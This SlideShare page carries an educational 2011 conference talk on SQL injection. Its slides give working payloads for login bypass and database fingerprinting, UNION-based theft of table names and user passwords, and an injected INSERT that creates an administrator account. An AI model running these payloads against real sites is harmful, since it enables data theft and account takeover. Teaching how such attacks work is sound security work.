SlideShare uma empresa Scribd logo

How did i steal your database CSCamp2011

Transferir como PPTX, PDF
Mostafa Siraj
Mostafa Siraj
Tecnologia
1 de 72
How Did I Steal Your Database Mostafa Siraj Application Security Expert
DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
Nearly all applications rely on a Datastore
What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
Injection in Search Fields 35
Entering Normal Input
Search Results
Trying Single Quote
I receive this error Error states that it’s
Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
I’m having an error, it’s not
Is it Note: string concatenation in Oracle is ||
Different error, still not
Is it Note: string concatenation in MySQL is blank space
It’s
The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
1. Get number of items after the SELECT statement
Error
Try another number
Result Why the results are less?
Try another number
Error, it’s not 8
Let’s try 7
Result How many columns do we have in the SELECT statement
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result
Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Injection with errors
Gives me an Error
Getting version ' and 1 in (SELECT @@version)--
Gives me this error
Getting Column names
I get this Error
Getting next column name ' group by login.firstname having 1=1--
I get this error
Again ' group by login.firstname, login.surname having 1=1--
Error reveals new column name
Again ' group by login.firstname, login.surname,login.username having 1=1--
New column name
Continue…
Continue…
Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
Not all Injections generate errors
DEMOSQLMap
You Were GREAT Audience
Thank You @mostafasiraj Mostafa Siraj

Recomendados

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RFayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commandsBalqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql aliasVivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basicwali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsSvetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query ThrowdownKarwin Software Solutions LLC
 

Recomendados

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RFayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commandsBalqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql aliasVivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basicwali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsSvetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query ThrowdownKarwin Software Solutions LLC
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0michelemanzotti
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methodsJayanthiNeelampalli
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databasesTriad Square InfoSec
 
Creating a database
Creating a databaseCreating a database
Creating a databaseRahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingnonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Edureka!
 
บทที่4
บทที่4บทที่4
บทที่4Waritsara Sonchan
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHPhamsa nandhini
 
Sq linjection
Sq linjectionSq linjection
Sq linjectionMahesh Gupta (DBATAG) - SQL Server Consultant
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECSUptech
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSgaurav koriya
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09sasa_eldoby
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Atsushi Odagiri
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
ApachepoitutorialSrikrishna k
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-cDhirendra Chauhan
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configurationMehdi jannati
 
Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfTamiratDejene1
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1iccma
 

Mais conteúdo relacionado

Mais procurados

Creating a database
Creating a databaseCreating a database
Creating a databaseRahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingnonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Edureka!
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHPhamsa nandhini
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECSUptech
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSgaurav koriya
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Atsushi Odagiri
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configurationMehdi jannati
 

Mais procurados (20)

Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methods
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databases
 
Creating a database
Creating a databaseCreating a database
Creating a database
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
 
บทที่4
บทที่4บทที่4
บทที่4
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHP
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECS
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
Apachepoitutorial
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-c
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configuration
 

Semelhante a How did i steal your database CSCamp2011

Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfTamiratDejene1
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1iccma
 
Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1Syed Asrarali
 
My SQL Skills Killed the Server
My SQL Skills Killed the ServerMy SQL Skills Killed the Server
My SQL Skills Killed the ServerdevObjective
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.pptHastavaramDineshKuma
 
Sql Basics | Edureka
Sql Basics | EdurekaSql Basics | Edureka
Sql Basics | EdurekaEdureka!
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standardsAlessandro Baratella
 
Advanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxAdvanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxEllenGracePorras
 

Semelhante a How did i steal your database CSCamp2011 (20)

Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdf
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1
 
Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1
 
Oracle notes
Oracle notesOracle notes
Oracle notes
 
Sql injection
Sql injectionSql injection
Sql injection
 
Hira
HiraHira
Hira
 
Sql injection
Sql injectionSql injection
Sql injection
 
Oracle Notes
Oracle NotesOracle Notes
Oracle Notes
 
My SQL Skills Killed the Server
My SQL Skills Killed the ServerMy SQL Skills Killed the Server
My SQL Skills Killed the Server
 
Sql killedserver
Sql killedserverSql killedserver
Sql killedserver
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
 
98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt
 
Introduction to database
Introduction to databaseIntroduction to database
Introduction to database
 
Dbms sql-final
Dbms sql-finalDbms sql-final
Dbms sql-final
 
Sql Basics | Edureka
Sql Basics | EdurekaSql Basics | Edureka
Sql Basics | Edureka
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standards
 
Advanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxAdvanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptx
 

Último

CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 

Último (20)

CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 

How did i steal your database CSCamp2011

  • 1. How Did I Steal Your Database Mostafa Siraj Application Security Expert
  • 2. DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
  • 3. Nearly all applications rely on a Datastore
  • 4. What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
  • 5. What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
  • 6. SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
  • 7. FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
  • 8. SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
  • 9. SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
  • 10. SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
  • 11. This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
  • 12. Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
  • 13. Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
  • 14. Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
  • 15. Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
  • 16. Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
  • 17. Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
  • 18. Injection in Search Fields 35
  • 22. I receive this error Error states that it’s
  • 23. Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
  • 24. I’m having an error, it’s not
  • 25. Is it Note: string concatenation in Oracle is ||
  • 27. Is it Note: string concatenation in MySQL is blank space
  • 29. The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
  • 30. The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
  • 31. The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
